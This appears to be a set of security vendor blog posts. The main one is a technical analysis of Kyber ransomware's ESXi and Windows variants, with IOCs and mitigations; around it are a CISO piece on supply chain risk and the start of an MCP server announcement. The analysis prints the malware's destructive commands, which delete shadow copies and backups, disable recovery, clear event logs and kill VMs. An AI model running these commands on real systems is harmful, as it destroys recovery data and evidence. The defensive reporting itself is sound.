Similarly, Engineering, DevOps, and Security teams should collaborate on establishing a trust and reputation scoring mechanism for supply chain dependencies. Being able to evaluate the speed of response, the transparency of communication and updates, and the ultimate resolution of a vulnerability or compromise speaks volumes about how much you can trust the maintainers of the software you depend on. The OpenSSF Scorecard project offers a great place to start evaluating the open source packages you’re already using.

Organizations should also have a fallback plan for when a security patch is not available. Options to consider include exploring other open source packages that perform similar functions, applying other mitigations such as application firewalling, or even forking the project and contributing a security patch back to the community.

Validation closes the loop by showing whether the artifact came from where it was supposed to, whether the package has drifted in unexpected ways, and whether the mitigations applied are reducing live risk rather than simply documenting the process.

How CISOs should think about the next 12 months

The strain on security teams is only growing, and the potential for AI to relieve some of that pressure is understandably compelling, especially when boards, CEOs, and CFOs are asking how the organization plans to adopt it. That makes this a leadership question as much as a technology one. CISOs need a clear point of view on where AI can genuinely improve resilience, where it still introduces too much uncertainty, and how to explain those choices in business terms.

If software engineering teams are already adopting AI-assisted development, security teams should be part of that conversation early, especially around dependency management. I have seen teams begin connecting AI coding agents to vulnerability management workflows so those agents can interpret vulnerabilities found in the code base, assess reachability with more context, help plan remediation, and validate updates much faster than traditional handoffs usually allow. Used well, that can reduce drag across the workflow and help teams move faster on classes of issues that are currently slowing them down.

Getting there safely still depends on the foundation underneath it. A more resilient path starts with a clearer picture of the environment and a more complete inventory of dependencies across source, build, and runtime. From there, ownership needs to be explicit, threat and vulnerability intelligence needs to be embedded into how the organization prioritizes, and dependency sprawl needs to be reduced with more discipline around what actually enters production. The same mindset should carry through to the build layer and developer endpoints, where tighter controls and better visibility help reduce unnecessary exposure, while faster and more repeatable paths from disclosure to action make it easier for teams to respond before risk compounds.

That foundation will matter regardless of which AI model or platform becomes dominant six or twelve months from now. It will also matter if the next wave of AI makes backlog reduction, lower-tier remediation, or patch validation more practical. Organizations that know what they run and how they operate will be in a much better position to adopt those capabilities with intent.

The shift security leaders should make now

Security in an AI-accelerated world needs to be managed as a systems challenge, with supply chain resilience shaped by how well organizations connect software composition, exposure visibility, dependency governance, threat intelligence, build integrity, endpoint controls, remediation workflows, and validation. When those layers are treated separately, gaps open quickly; when they are tied together through a stronger operating model, teams are in a much better position to absorb faster discovery without losing control of the response.

For CISOs, that means continuing to use open source with a more deliberate view of dependency risk, reducing unnecessary packages where possible, knowing what is running and who owns it, and monitoring threat and vulnerability intelligence with enough discipline to act before the queue overwhelms the team. It also means paying closer attention to the attack surface across production, build, and developer environments, while treating AI as something that will amplify both the strengths and the weaknesses already present in the program. Faster discovery is here, and the organizations that handle it best will be the ones that can respond with the same level of discipline.

Kyber Ransomware Double Trouble: Windows and ESXi Attacks Explained

21 April 2026 at 10:38

Overview

For executive leadership, the emergence of Kyber ransomware represents a significant and immediate threat due to its specialized, dual-platform deployment capability targeting mission-critical virtualization infrastructure (VMware ESXi) and core Windows file systems. This cross-platform approach, coupled with effective anti-recovery measures, drastically elevates the risk of a total operational disruption. Organizations should treat Kyber not merely as another ransomware strain, but as a specialized tool capable of causing a complete operational blackout. Recent real-world incidents have demonstrated that this approach can result in large-scale operational impact across enterprise environments.

During a March 2026 incident response engagement, Rapid7 recovered two Kyber ransomware payloads deployed in the same environment, one targeting VMware ESXi infrastructure and the other Windows file servers. This provided a rare opportunity to analyze both variants side by side. For context, in March 2026 Rapid7 recorded over 900 publicly reported ransomware incidents.

The ESXi variant is specifically built for VMware environments, with capabilities for datastore encryption, optional virtual machine termination, and defacement of management interfaces. The Windows variant, written in Rust, includes a self-described “experimental” feature for targeting Hyper-V.

Despite these differences, both samples share a campaign identifier and Tor-based ransom infrastructure, confirming coordinated cross-platform deployment. Notably, the ransomware’s cryptographic claims are not consistent across variants. The ESXi sample advertises “post-quantum” encryption using Kyber1024, but in practice relies on ChaCha8 with RSA-4096 key wrapping, while the Windows variant does implement the advertised hybrid scheme. As usual, ransom notes prove to be more aspirational than accurate.

Kyber is a relatively new ransomware group that has recently gained visibility. Despite this, public technical analysis of the malware remains limited. The lack of spotlight on the group presented an opportunity to share our findings with the community.

Technical analysis

Kyber is a cross-platform ransomware family targeting Linux/ESXi and Windows environments. Both variants share Tor infrastructure and a campaign ID, but differ in implementation language, cryptography, and feature set. While both reference the same encryption scheme in their ransom notes, only the Windows variant appears to implement it as described.

| Property | ELF (Linux/ESXi) | PE (Windows) |
|---|---|---|
| Language | C++, GCC 4.4.7 (2012) | Rust, MSVC 19.36 / VS2022 |
| Actual crypto | ChaCha + RSA-4096 | AES-256-CTR + Kyber1024 + X25519 |
| Note claims | AES + X25519 + Kyber | AES + X25519 + Kyber |
| Extension | `.xhsyw` | `.#~~~` |
| Ransom note | readme.txt | READ_ME_NOW.txt |
| VM targeting | Native esxcli | PowerShell Get-VM (experimental) |
| Anti-recovery | None | 11 commands (elevation required) |

In addition, both variants share a common campaign ID and Tor-based infrastructure, including a negotiation portal and leak site, indicating coordinated operations across platforms.

Campaign ID: 5176[REDACTED]

Tor chat: Mlnmlnnrdhcaddwll4zqvfd2vyqsgtgj473gjoehwna2v4sizdukheyd[.]onion

Tor blog: Kyblogtz6k3jtxnjjvluee5ec4g3zcnvyvbgsnq5thumphmqidkt7xid[.]onion

Chat path: /chat/5176[REDACTED]

Linux/ESXi variant

The Linux/ESXi variant (SHA-256: 6ccacb7567b6c0bd2ca8e68ff59d5ef21e8f47fc1af70d4d88a421f1fc5280fc) is a 64-bit ELF executable, not stripped, written in C++ and statically linked against OpenSSL 1.0.1e-fips.

The sample was developed to target ESXi environments. As shown in Figure 1, the help text for the required path argument explicitly references the datastore path /vmfs/volumes, the root directory on VMware ESXi hosts where VMFS (Virtual Machine File System) datastores are mounted. The malware also relies on the ESXi-native esxcli tooling and targets VMware-specific paths and artifacts.

target-path-binary-help-text-names-vmfs-volumes.png
Figure 1: The binary's help text names /vmfs/volumes as the intended target path.

The execution flow is straightforward:

  1. Parse CLI arguments (path required, size validated 0–100)

  2. Initialize logging (optional)

  3. Optionally enumerate and terminate VMs (vmkill)

  4. Load embedded RSA-4096 public key

  5. Initialize thread pool (capped at 12 threads)

  6. Traverse directories and submit encryption jobs

Background execution

To ensure encryption continues after an SSH session ends, the malware implements a detach flag. When enabled, it forks and exits the parent process, allowing the child to run in the background. The child then calls setsid() to detach from the controlling terminal, avoiding the SIGHUP signal typically sent when a session closes.

This allows the attacker to disconnect safely while encryption of /vmfs/volumes datastores continues uninterrupted in the background.
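The fork-then-setsid pattern is standard POSIX daemonization. A minimal Python illustration of the same idea (this is a sketch of the mechanism, not the malware's C++ code; here the parent waits and reads a result so the behavior is observable, whereas the malware's parent simply exits):

```python
import os

def run_detached(task):
    """Fork, detach the child from the controlling terminal with setsid(),
    and let it finish independently -- the same mechanism the 'detach' flag
    uses to dodge the SIGHUP sent when an SSH session closes."""
    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:                     # child
        os.close(r)
        os.setsid()                  # new session: no controlling terminal
        os.write(w, task())          # stand-in for the encryption loop
        os._exit(0)
    os.close(w)                      # parent: the malware's parent exits here
    result = os.read(r, 64)
    os.waitpid(pid, 0)
    return result

print(run_detached(lambda: b"still running after logout").decode())
```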

Targeting VMware

If the vmkill flag is set, the binary enumerates all running VMs before starting encryption. It forks a child process that executes the ESXi-native management command esxcli vm process list, redirecting its output to a temporary file via dup2(). The output is then parsed line by line to extract Display Name and World ID pairs.

If a whitelist is provided via the whitelist argument, matching VMs are skipped. All other VMs are terminated sequentially using esxcli vm process kill type=soft world-id <id>, with the parent process waiting for each shutdown to complete before proceeding.
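The enumeration step amounts to a line-by-line parse of the redirected command output. The sample text below is hypothetical (the real esxcli field layout may differ), but the Display Name/World ID pairing and the whitelist logic follow the description above:

```python
# Hypothetical esxcli vm process list output; real formatting may differ.
SAMPLE_OUTPUT = """\
web-server
   World ID: 12345
   Process ID: 0
   Display Name: web-server
db-server
   World ID: 67890
   Display Name: db-server
"""

def parse_vm_list(text, whitelist=()):
    """Extract (display name, world id) pairs, skipping whitelisted VMs."""
    vms, world_id = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("World ID:"):
            world_id = line.split(":", 1)[1].strip()
        elif line.startswith("Display Name:"):
            name = line.split(":", 1)[1].strip()
            if world_id is not None and name not in whitelist:
                vms.append((name, world_id))
            world_id = None
    return vms

# Each surviving pair becomes one 'esxcli vm process kill' invocation.
print(parse_vm_list(SAMPLE_OUTPUT, whitelist=("db-server",)))
# → [('web-server', '12345')]
```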

Two implementation choices stand out here. First, the ransomware uses fork/execlp rather than system(). By calling fork() and then execlp() directly, ransomware developers bypass the shell entirely. This means the arguments are passed as a null-terminated array of strings (argv) directly to the execve system call. If a VM name contained a space or a special character, a system() call might crash or behave unexpectedly, but execlp ensures the command is executed exactly as intended. This suggests the developer is familiar with low-level system programming.
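The same argv-versus-shell distinction exists in most languages. A Python analogue (illustrative only) shows why a hostile VM name is harmless when passed as a discrete argument:

```python
import subprocess
import sys

vm_name = "prod-db; rm -rf /"   # a display name full of shell metacharacters

# argv-style, like fork()+execlp(): the name reaches the child process as a
# single argument, byte for byte, with no shell parsing in between.
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", vm_name],
    capture_output=True, text=True,
)
print(result.stdout.strip())    # the name survives intact

# The shell-style equivalent, subprocess.run(f"echo {vm_name}", shell=True),
# would instead hand the string to a shell, which would split on ';' and try
# to run the second half as its own command.
```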

Second, the use of type=soft requests a graceful shutdown rather than a forced termination. This likely reduces the risk of corrupting VM disk state prior to encryption. After issuing shutdown commands, the binary sleeps for roughly two seconds before continuing, allowing ESXi to complete the operation.

Directory traversal

The malware performs a recursive directory walk to identify targets. Interestingly enough, it drops a readme.txt ransom note into every folder before the encryption routine begins. The traversal logic does not follow symbolic links, as traversing them can lead to unexpected areas of the filesystem. The sample does not implement an extension allowlist. Files are encrypted unless explicitly excluded.

The binary explicitly ignores files with the following extensions or names:

.xhsyw (already encrypted)
.locksignal, .processing, .cryptdata_backup
.tmp, readme.txt
.sf (VMware System Files)

Figure 2: Confirmed exclusion list, protecting in-progress files, already-encrypted files, and VMware system files from double-processing.
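A walk honoring that exclusion list can be sketched in a few lines (a Python approximation of the described behavior, not the binary's C++):

```python
import os

SKIP_SUFFIXES = (".xhsyw", ".locksignal", ".processing",
                 ".cryptdata_backup", ".tmp", ".sf")
SKIP_NAMES = {"readme.txt"}

def candidate_files(root):
    """Recurse without following symlinks, yielding every file not on the
    exclusion list -- there is no allowlist, so everything else is fair game."""
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        for name in filenames:
            lowered = name.lower()
            if lowered in SKIP_NAMES or lowered.endswith(SKIP_SUFFIXES):
                continue
            yield os.path.join(dirpath, name)
```

Because the malware drops readme.txt into each directory before encrypting, the note itself has to appear on the exclusion list to avoid being encrypted.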

Encryption: marketing vs reality

The ransom note claims the malware uses the AES-256-CTR, X25519, and Kyber1024 algorithms for encryption.

Ransom-note-embedded-ELF.png
Figure 3: Ransom note embedded in the ELF binaries claims AES-256-CTR and X25519/Kyber1024 algorithms.

Our technical analysis, however, says otherwise. Decompilation of the core encryption logic shows the cipher is actually ChaCha8. Two indicators support this conclusion. First, in the ECRYPT_encrypt_bytes subroutine (Figure 4) the loop executes 8 rounds (i = 8; i > 0; i -= 2), and the code applies 32-bit right rotations with constants 16, 20, 24, and 25. These correspond to the standard ChaCha left-rotation constants (16, 12, 8, and 7) defined in RFC 8439.

IDA-decompilation-ECRYPT-encrypt-bytes-function.png
Figure 4: IDA decompilation of ECRYPT_encrypt_bytes function
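The identification rests on a simple identity: a 32-bit right-rotation by 32−k equals a left-rotation by k, so the observed constants 16, 20, 24, and 25 are exactly ChaCha's 16, 12, 8, and 7. A quick check:

```python
MASK = 0xFFFFFFFF

def rotl32(x, k):
    """32-bit rotate left, as written in RFC 8439's ChaCha quarter-round."""
    return ((x << k) | (x >> (32 - k))) & MASK

def rotr32(x, k):
    """32-bit rotate right, as it appears in the decompiled loop."""
    return ((x >> k) | (x << (32 - k))) & MASK

# The decompiler's right-rotation constants map onto ChaCha's left rotations.
for left, right in [(16, 16), (12, 20), (8, 24), (7, 25)]:
    assert rotl32(0xDEADBEEF, left) == rotr32(0xDEADBEEF, right)
print("right rotations 16/20/24/25 == ChaCha left rotations 16/12/8/7")
```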

Second, the ECRYPT_keysetup function (Figure 5) uses the "expand 32-byte k" sigma constant. For 256-bit keys, the malware initializes its state by placing this constant in words 0–3 and the key in words 4–11, mirroring the standard ChaCha layout.

IDA-decompilation-ECRYPT-keysetup-function.png
Figure 5: IDA decompilation of ECRYPT_keysetup function

OpenSSL is statically linked but only handles RSA-4096 key wrapping. We did not find any “post-quantum” cryptography in the binary. The operator likely just copy-pasted the ransom note from the Windows variant, which actually supports Kyber1024.

Partial encryption strategy

Partial encryption is handled by the size-based encryptFilePartly() function:

  • Files under 1MB: entire file encrypted

  • Files between 1MB and 4MB: first 1MB encrypted

  • Files above 4 MB: only a calculated portion of each file is encrypted, with the proportion controlled by size; the program validates this value as 0–100 in main(), and the default observed setting is 10.

This approach significantly reduces encryption time while still rendering large files (e.g., VMDKs) unusable.
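The size thresholds reduce to a small policy function. A sketch of the described behavior (boundary handling at exactly 1 MB and 4 MB is assumed; only the thresholds and the 0–100 default of 10 come from the analysis):

```python
MB = 1024 * 1024

def bytes_to_encrypt(file_size, size_pct=10):
    """How much of a file gets encrypted under the described policy: small
    files fully, mid-size files their first 1 MB, large files a percentage
    set by the 0-100 'size' argument (observed default: 10)."""
    if not 0 <= size_pct <= 100:
        raise ValueError("size must be between 0 and 100")
    if file_size < 1 * MB:
        return file_size                      # under 1 MB: whole file
    if file_size <= 4 * MB:
        return 1 * MB                         # 1-4 MB: first megabyte only
    return file_size * size_pct // 100        # above 4 MB: proportional slice

# A 60 GB VMDK at the default setting: only ~6 GB is actually touched.
print(bytes_to_encrypt(60 * 1024 * MB) // MB, "MB")  # → 6144 MB
```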

Encryption workflow

Each file is encrypted with a unique ChaCha8 key. Before encrypting a file, the binary creates a .locksignal file and renames the original to .processing to prevent concurrent processing. It then checks the last 535 bytes for a metadata trailer containing the markers KYBER, CDTA, and ATDC. If these are present, the file is skipped as already encrypted.

For new targets, the malware generates a 40-byte key/IV set and wraps it using an embedded RSA-4096 public key. This metadata is appended to the file and verified before encryption begins. A redundant copy is also saved as <file>.cryptdata_backup. Encryption is performed in-place in 1 MB chunks. On success, the file is renamed from .processing to .xhsyw. Any files left with the .processing suffix indicate an interrupted or failed encryption attempt.
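The already-encrypted skip check can be approximated in a few lines. The trailer's internal layout beyond the three markers is not documented here, so this sketch only mirrors the marker scan over the final 535 bytes:

```python
import os

TRAILER_LEN = 535
MARKERS = (b"KYBER", b"CDTA", b"ATDC")

def already_encrypted(path):
    """Read the final 535 bytes and treat the file as encrypted only if
    all three metadata markers are present, as the binary is described
    to do before queueing a file for encryption."""
    with open(path, "rb") as f:
        f.seek(0, os.SEEK_END)
        f.seek(max(0, f.tell() - TRAILER_LEN))
        tail = f.read()
    return all(marker in tail for marker in MARKERS)
```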

Defacing every entry point

Even before encryption, the ransomware binary replaces three specific files:

  • SSH access: replaces /etc/motd (Message of the Day), displaying the ransom note immediately to anyone logging in via SSH.

  • Web management: replaces the VMware web UI index page at /usr/lib/vmware/hostd/docroot/index.html and the Host Client interface at /usr/lib/vmware/hostd/docroot/ui/index.html.

Whether an administrator logs in via SSH or hits the web management portal, they are immediately met with the ransom note. On non-ESXi systems where these paths don't exist, the rename fails gracefully and execution continues.

Execution-log-from-REMnux-test.png
Figure 6: Execution log from REMnux test: defacement fails gracefully on non-ESXi, encryption proceeds.

Windows variant

The Windows sample (SHA-256: 45bff0df2c408b3f589aed984cc331b617021ecbea57171dac719b5f545f5e8d) is a 64-bit PE executable written in Rust and compiled with MSVC (VS2022). Much like the ESXi variant, the Windows binary is not packed, obfuscated, or even stripped. It retains full Rust panic strings and cargo dependency paths, including the build path C:\Users\user\.cargo\registry\src\index.crates.io-6f17d22bba15001f.

Additionally, the binary’s version flag reveals the project name as win_encryptor 1.0.

Ransomwares-CLI-interface.png
Figure 7: Ransomware's CLI interface

The Windows binary exposes a minimal CLI (Figure 7), requiring the path argument to specify the target directory. It also includes a system flag, self-described as "experimental", that is intended to enforce a hard stop on Hyper-V virtual machines.

The ransomware performs full runtime initialization even when invoked with just the help flag. It aggregates entropy from four sources: system time, the Windows CSPRNG, processor-based entropy via RDRAND, and running process data, producing ~30 KB of randomness to seed an internal AES-CTR DRBG. Unlike typical ransomware, which often relies only on BCryptGenRandom, this strain implements a custom entropy pipeline, suggesting the developer cared about key material quality.

After initialization, the binary checks whether it is running with elevated privileges by attempting to acquire SeDebugPrivilege, logging the result to the console.

This privilege check determines whether the destructive commands will be executed. Without elevation, the binary performs only file encryption. With elevation, it unlocks its full toolkit: killing services, modifying the registry, and wiping shadow copies to prevent recovery.

Service termination and anti-recovery

When running with elevated privileges, the binary first terminates services matching five patterns (msexchange, vss, backup, veeam, and sql) using the OpenSCManagerA, EnumServicesStatusA, and ControlService API calls. The malware forces the system locale to en-US before service enumeration; this normalization ensures that pattern matching on service names remains reliable regardless of the victim's native system language.
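A minimal sketch of the matching logic, assuming straightforward case-insensitive substring comparison (the sample's exact matching routine is not documented here):

```python
# The five substrings the sample matches against enumerated service names
KILL_PATTERNS = ("msexchange", "vss", "backup", "veeam", "sql")

def should_terminate(service_name: str) -> bool:
    """Case-insensitive substring match over service names. Forcing the
    en-US locale before enumeration keeps enumerated names predictable,
    so a simple lowercase comparison stays reliable across victims."""
    name = service_name.lower()
    return any(pattern in name for pattern in KILL_PATTERNS)
```

For example, `should_terminate("MSSQLSERVER")` and `should_terminate("VeeamBackupSvc")` both match, while unrelated services such as the print spooler do not.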

It then executes 11 commands via CreateProcessW, listed in the table below.

| # | Command | Purpose |
|---|---------|---------|
| 1 | powershell -ep bypass -nop -c "Get-WmiObject -Class Win32_ShadowCopy \| ForEach-Object { $_.Delete() }" | Delete VSS shadow copies via WMI |
| 2 | wmic.exe SHADOWCOPY DELETE /nointeractive | Delete shadow copies via WMIC |
| 3 | vssadmin.exe Delete Shadows /all /quiet | Delete shadow copies via vssadmin |
| 4 | bcdedit.exe /set {default} recoveryenabled No | Disable Windows Recovery Environment |
| 5 | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Suppress boot failure prompts |
| 6 | wbadmin DELETE SYSTEMSTATEBACKUP | Delete system state backups |
| 7 | wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest | Delete oldest system state backup |
| 8 | iisreset.exe /stop | Stop IIS to release locked web files |
| 9 | reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f | Increase SMB concurrent connections |
| 10 | for /F "tokens=*" %i in ('wevtutil el') do wevtutil cl "%i" | Clear all Windows event logs |
| 11 | rd /s /q C:\$Recycle.Bin | Empty the Recycle Bin |

Table 2: The 11 commands executed by the ransomware when running with elevated privileges

Hyper-V shutdown

If the system flag is set, the binary enumerates Hyper-V virtual machines via PowerShell before encryption:

Get-VM | select VMId, Name | ConvertTo-Json
Stop-VM -Force -TurnOff

Figure 8: PowerShell commands used for Hyper-V termination.

Each VM is terminated with a "hard stop" (-TurnOff) which forces an abrupt shutdown, releasing file locks so the malware can encrypt. As noted in the CLI help text, the developer currently considers this Hyper-V functionality "experimental."

File encryption workflow

For each file, the binary checks for a prior encryption marker to avoid redundant processing. If the file is locked, the malware uses the Windows Restart Manager to identify and terminate the responsible process. If access is still denied, it modifies the file’s permissions (ACL) to Everyone:FullControl and clears the read-only attribute. It retries this entire sequence up to three times per file to ensure it can successfully open and encrypt the data.
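A simplified sketch of that per-file loop. The marker value is hypothetical, and the Restart Manager call and Everyone:FullControl ACL reset are replaced by portable stand-ins; the real implementation uses Windows-specific APIs.

```python
import os

# Hypothetical marker value; the real sample's marker format is undocumented here
ENCRYPTION_MARKER = b"KYBER_ENC"

def already_encrypted(path: str) -> bool:
    """Skip files that carry a prior-encryption marker, avoiding
    redundant processing on a second run."""
    with open(path, "rb") as f:
        return f.read(len(ENCRYPTION_MARKER)) == ENCRYPTION_MARKER

def force_writable(path: str) -> None:
    """Stand-in for the real sample's ACL reset (Everyone:FullControl)
    and clearing of the read-only attribute."""
    os.chmod(path, 0o666)

def open_for_encryption(path: str, attempts: int = 3):
    """Up to three attempts per file, loosening permissions between tries.
    The real sample also uses the Windows Restart Manager to terminate
    whichever process holds the lock; that step is omitted here."""
    last_error = None
    for _ in range(attempts):
        try:
            return open(path, "r+b")
        except PermissionError as exc:
            last_error = exc
            force_writable(path)
    raise last_error
```

The retry budget is the interesting design choice: rather than failing fast on locked or protected files, the malware escalates access step by step to maximize encryption coverage.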

Once encryption succeeds, the file is renamed with the .#~~~ extension, and a READ_ME_NOW.txt ransom note is dropped in the directory. Each successful operation is logged to the console as Successfully encrypted <file>. File size: <size>. To maintain system stability and to keep the OS bootable, the malware excludes critical system directories and files from encryption listed below:

$recycle.bin,perflog,system volume information,thumb,programdata,appdata,microsoft,netframework,c$, all users

Figure 9: Skipped directories

READ_ME_NOW.txt,lockerlog_*,processed_file.icon,ntuser.dat,ntuser.dat.log,ntuser.ini,desktop.ini,autorun.inf,ntldr,bootsect.bak,thumbs.db,boot.ini,iconcache.db,bootfont.bin

Figure 10: Skipped files

Cryptography

Unlike the Linux variant, this sample actually uses what it claims: Kyber1024 and AES-256-CTR.

The sample uses a hybrid encryption design. The embedded public key is validated against the expected Kyber1024 public key size of 1568 (0x620) bytes.

Figure 11: Public key size check (1,568 bytes / 0x620) with branch to error on mismatch

Following validation, the sample initializes an AES-256 CTR context using a 32-byte key, which it expands into a 60-word key schedule.

This confirms that Kyber is not used for direct file encryption. Instead, Kyber1024 protects the symmetric key material, while AES-CTR handles bulk data encryption. 
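The hybrid design can be illustrated with the following sketch. It is conceptual rather than a reimplementation: the Kyber1024 KEM is mocked (real encapsulation requires a post-quantum library), and a SHA-256 counter keystream stands in for AES-256-CTR, which Python's standard library does not provide.

```python
import hashlib
import os

KYBER1024_PK_LEN = 0x620   # 1,568 bytes: the public key size the sample validates
KYBER1024_CT_LEN = 1568    # Kyber1024 KEM ciphertexts are also 1,568 bytes

def mock_encapsulate(public_key: bytes):
    """Stand-in for Kyber1024 encapsulation, returning (kem_ciphertext,
    shared_secret). A real KEM derives both from the public key so the
    private-key holder can recover the secret; here both are random
    placeholders that only illustrate the data flow."""
    if len(public_key) != KYBER1024_PK_LEN:
        raise ValueError("unexpected Kyber1024 public key size")
    return os.urandom(KYBER1024_CT_LEN), os.urandom(32)

def keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """SHA-256 counter keystream standing in for AES-256-CTR."""
    out = bytearray()
    block = 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + block.to_bytes(8, "little")).digest()
        block += 1
    return bytes(out[:n])

def encrypt_blob(data: bytes, public_key: bytes):
    """Hybrid scheme: the KEM protects the per-file symmetric key, while
    the stream cipher handles bulk data. kem_ct and nonce are kept with
    the ciphertext so the operator's private key can recover file_key."""
    kem_ct, file_key = mock_encapsulate(public_key)
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(data, keystream(file_key, nonce, len(data))))
    return kem_ct, nonce, ct
```

This mirrors the structure the binary implements: each file gets a fresh symmetric key, and only the operator-held Kyber private key can unwrap it, so no decryption key ever exists on disk in the clear.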

Registry artifacts and icon registration

When executed with elevated privileges, the malware assigns a custom icon to encrypted files by registering the .#~~~ extension. It creates the C:\fucked_icon\ directory, writes processed_file.icon to that location, and configures it in the registry as the extension's default icon.

Figure 12: Regedit output after execution of Kyber with elevated privileges

The malware executes ie4uinit.exe to refresh the shell icon cache. This forces Windows to display the new icons immediately across the filesystem without a system restart.

Mutex

The choice of the mutex is interesting. The mutex name boomplay[.]com/songs/182988982 is stored as a wide string in .rdata and appears to be a link to a song on Boomplay, which is a legitimate African music streaming platform. We were unable to identify the specific track due to geo-restrictions we could not bypass.
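Because the mutex name is stored as a wide (UTF-16LE) string in .rdata, a plain ASCII search over the binary will miss it. A small triage helper that checks both encodings:

```python
MUTEX_NAME = "boomplay.com/songs/182988982"

def find_indicator(blob: bytes, indicator: str = MUTEX_NAME):
    """Return the encodings under which an indicator string appears in a
    binary blob. The sample stores its mutex name as UTF-16LE, so tools
    that only scan for ASCII strings will not surface it."""
    hits = []
    for encoding in ("ascii", "utf-16-le"):
        if indicator.encode(encoding) in blob:
            hits.append(encoding)
    return hits
```

Running this over a suspect PE (for example, `find_indicator(open(path, "rb").read())`) flags the mutex string regardless of how it was embedded.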

Mitigation guidance

Based on the observed Tactics, Techniques, and Procedures (TTPs), organizations should focus on the following defensive actions:

Harden virtualization infrastructure (T1021.004)

Kyber’s reliance on SSH for ESXi host access and native tooling like esxcli highlights critical control points.

  • Implement least-privilege access for ESXi shell and SSH, ideally disabling them entirely unless required for maintenance.

  • Enforce multi-factor authentication (MFA) on all management interfaces and accounts.

  • Monitor esxcli execution for VM termination (vm process kill) or configuration changes, which are late-stage indicators of compromise.

Prevent anti-recovery (T1485, T1070.001, T1562.001)

Kyber uses 11 distinct commands to impair defenses, including VSS deletion and log clearing.

  • Restrict execution: Prevent unprivileged users from executing command-line utilities like vssadmin.exe, wmic.exe, and wevtutil.exe.

  • Protect backups: Ensure backups (especially Veeam/SQL targets) are immutable and stored off-host or in segregated network segments that the Windows variant cannot reach, even with elevated privileges. The ransomware explicitly targets these services and file systems.

Detection focus (lateral movement & defacement):

  • Monitor for defacement artifacts: Actively monitor for changes to VMware's management files (/etc/motd, /usr/lib/vmware/hostd/docroot/index.html, etc.) in ESXi environments.

  • Hunt for known indicators: Incorporate the provided IOCs, including the mutex boomplay[.]com/songs/182988982 and the .xhsyw and .#~~~ file extensions, into detection rules.
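One lightweight way to watch the defacement paths described earlier is a baseline hash comparison. This is a hedged sketch, not a substitute for proper file integrity monitoring:

```python
import hashlib
import os

# The ESXi defacement targets described in this report
WATCHED_PATHS = [
    "/etc/motd",
    "/usr/lib/vmware/hostd/docroot/index.html",
    "/usr/lib/vmware/hostd/docroot/ui/index.html",
]

def baseline(paths):
    """Record the SHA-256 of each watched file (None if absent)."""
    snap = {}
    for p in paths:
        if os.path.isfile(p):
            with open(p, "rb") as f:
                snap[p] = hashlib.sha256(f.read()).hexdigest()
        else:
            snap[p] = None
    return snap

def detect_changes(paths, snapshot):
    """Return the paths whose content hash no longer matches the baseline,
    e.g. after a ransom note replaces the MOTD or web UI index pages."""
    current = baseline(paths)
    return [p for p in paths if current[p] != snapshot[p]]
```

A scheduled job could snapshot `WATCHED_PATHS` after each legitimate maintenance window and alert on any later mismatch.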

MITRE ATT&CK techniques

| ID | Technique | Use |
|----|-----------|-----|
| T1486 | Data Encrypted for Impact | Primary objective for both variants. |
| T1485 | Data Destruction | Deletion of shadow copies and backups via vssadmin and wmic. |
| T1489 | Service Stop | Terminating ESXi processes and Windows database services. |
| T1070.001 | Indicator Removal: Clear Windows Event Logs | Using wevtutil to clear logs after infection. |
| T1021.004 | Remote Services: SSH | Primary vector for interacting with ESXi hosts. |
| T1562.001 | Impair Defenses: Disable or Modify Tools | Disabling Windows Recovery Environment and boot failure prompts. |

Indicators of compromise (IOCs)

| Type | Indicator | Description |
|------|-----------|-------------|
| SHA-256 | 6ccacb7567b6c0bd2ca8e68ff59d5ef21e8f47fc1af70d4d88a421f1fc5280fc | Linux/ESXi ELF binary |
| SHA-256 | 45bff0df2c408b3f589aed984cc331b617021ecbea57171dac719b5f545f5e8d | Windows Rust binary |
| SHA-256 | 4ed176edb75ae2114cda8cfb3f83ac2ecdc4476fa1ef30ad8c81a54c0a223a29 | Older Windows variant |
| Extension | .xhsyw | Encrypted file extension (Linux) |
| Extension | .#~~~ | Encrypted file extension (Windows) |
| Filename | readme.txt / READ_ME_NOW.txt | Ransom notes |
| Mutex | boomplay[.]com/songs/182988982 | Mutex used by the Windows variant |

Conclusion

Kyber ransomware isn’t a masterpiece of complex code, but it is highly effective at causing destruction. It reflects a shift toward specialization over sophistication. The operators didn’t need custom exploits or zero-days, because they didn’t have to use them. Instead, they simply used the standard ransomware playbook of abusing native tools like esxcli and vssadmin, and it was enough.

The encryption claims in the ransom note aren't the main story. If anything, they highlight a gap between the campaign's marketing and its execution. Defenses must now be measured against the attacker's specialization, not their code complexity, and ignoring Kyber's multi-platform nature risks a total operational blackout.

From Bulk Export to AI-ready Security Workflows: Introducing Rapid7’s Open-Source MCP Server and Agent Skill

21 April 2026 at 09:58

Security teams want more from their data than APIs and one-off reports.

They want to ask better questions, move faster, and bring security context into the workflows they are already building. That's especially true as more organizations experiment with private AI assistants, internal copilots, and LLM-powered automation. Part of this experimentation is, of course, an attempt to lower the pressure on teams that have to figure out how to prioritize the sheer number of actionable vulnerabilities that efforts like Project Glasswing are quickly becoming hyper-skilled at spotting.

That's why Rapid7 is introducing a free, open-source MCP Server and Agent Skill for Bulk Export. Bulk Export is a highly efficient way to access all your Rapid7 data: no more paging APIs, no more verbose output. It creates a local offline replica of your data that the LLM can efficiently and quickly interrogate, reducing token cost and the time to answer questions.

This new MCP and Agent Skill gives customers a standardized way to connect Rapid7 vulnerability and exposure data to AI assistants and custom AI workflows. Built as an open-source bridge, it helps customers bring their Rapid7 data into the tools and experiences that work best for their teams.


Why this matters now

Security teams are no longer just buying tools. They’re connecting systems, shaping workflows, and testing how AI can help analysts, IT teams, and leaders get to answers faster. For many teams, the path from raw security data to usable AI context is still manual. It often means exporting data, building wrappers, shaping queries, and managing custom integrations.

